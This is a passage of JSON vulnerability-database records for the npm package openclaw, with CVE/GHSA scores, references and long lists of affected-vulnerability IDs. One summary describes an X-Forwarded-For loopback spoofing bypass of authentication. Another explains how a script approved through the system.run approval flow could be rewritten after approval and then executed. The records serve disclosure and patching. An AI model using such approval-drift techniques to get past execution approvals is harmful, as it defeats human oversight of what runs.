/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-356
56"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-xff-loopback-spoofing-bypass-in-canvas-authentication-and-rate-limiter","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:23:19Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-xff-loopback-spoofing-bypass-in-canvas-authentication-and-rate-limiter"},{"reference_url":"https://github.com/advisories/GHSA-844j-xrrq-wgh4","reference_id":"GHSA-844j-xrrq-wgh4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-844j-xrrq-wgh4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"
},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"
},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"
},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"
},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"
},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35656","GHSA-844j-xrrq-wgh4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sw3m-5ryw-jbdh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50914?format=json","vulnerability_id":"VCID-swjf-k83n-h7gf","summary":"OpenClaw's system.run approvals did not bind mutable script operands across approval and execution\nOpenClaw's `system.run` approval flow did not bind mutable interpreter-style script operands across approval and execution.\n\nA caller could obtain approval for an execution such as `sh ./script.sh`, rewrite the approved script before execution, and then execute different content under the previously approved command shape. The approved `argv` values remained the same, but the mutable script operand content could drift after approval.\n\nLatest published npm version verified vulnerable: `2026.3.7`\n\nThe initial March 7, 2026 fix in `c76d29208bf6a7f058d2cf582519d28069e42240` added approval binding for shell scripts and a narrow interpreter set, but follow-up maintainer review on March 8, 2026 found that `bun` and `deno` script operands still did not produce `mutableFileOperand` snapshots.\n\nA complete fix shipped on March 9, 2026 in `cf3a479bd1204f62eef7dd82b4aa328749ae6c91`, which binds approved `bun` and `deno run` script operands to on-disk file snapshots and denies post-approval script drift before 
execution.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32921","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20423","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00066","scoring_system":"epss","scoring_elements":"0.20566","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00066","scoring_system":"epss","scoring_elements":"0.20552","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32921"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c76d29208bf6a7f058d2cf582519d28069e42240","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T12:25:07Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c76d29208bf6a7f058d2cf582519d28069e42240"},{"reference_url":"https://github.com/openclaw/openclaw/commit/cf3a479bd1204f62eef7dd82b4aa328749ae6c91","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_
textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T12:25:07Z/"}],"url":"https://github.com/openclaw/openclaw/commit/cf3a479bd1204f62eef7dd82b4aa328749ae6c91"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32921","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32921"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-script-content-modification-via-mutable-operand-binding-in-system-run","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T12:25:07Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-script-content-modification-via-mutable-operand-binding-in-system-run"},{"reference_url":"https://github.com/advisories/GHSA-8g75-q649-6pv6","reference_id":"GHSA-8g75-q649-6pv6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8g75-q649-6pv6"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8g75-q649-6pv6","reference_id":"GHSA-8g75-q649-6pv6","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system"
:"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T12:25:07Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8g75-q649-6pv6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},
{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},
{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},
{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz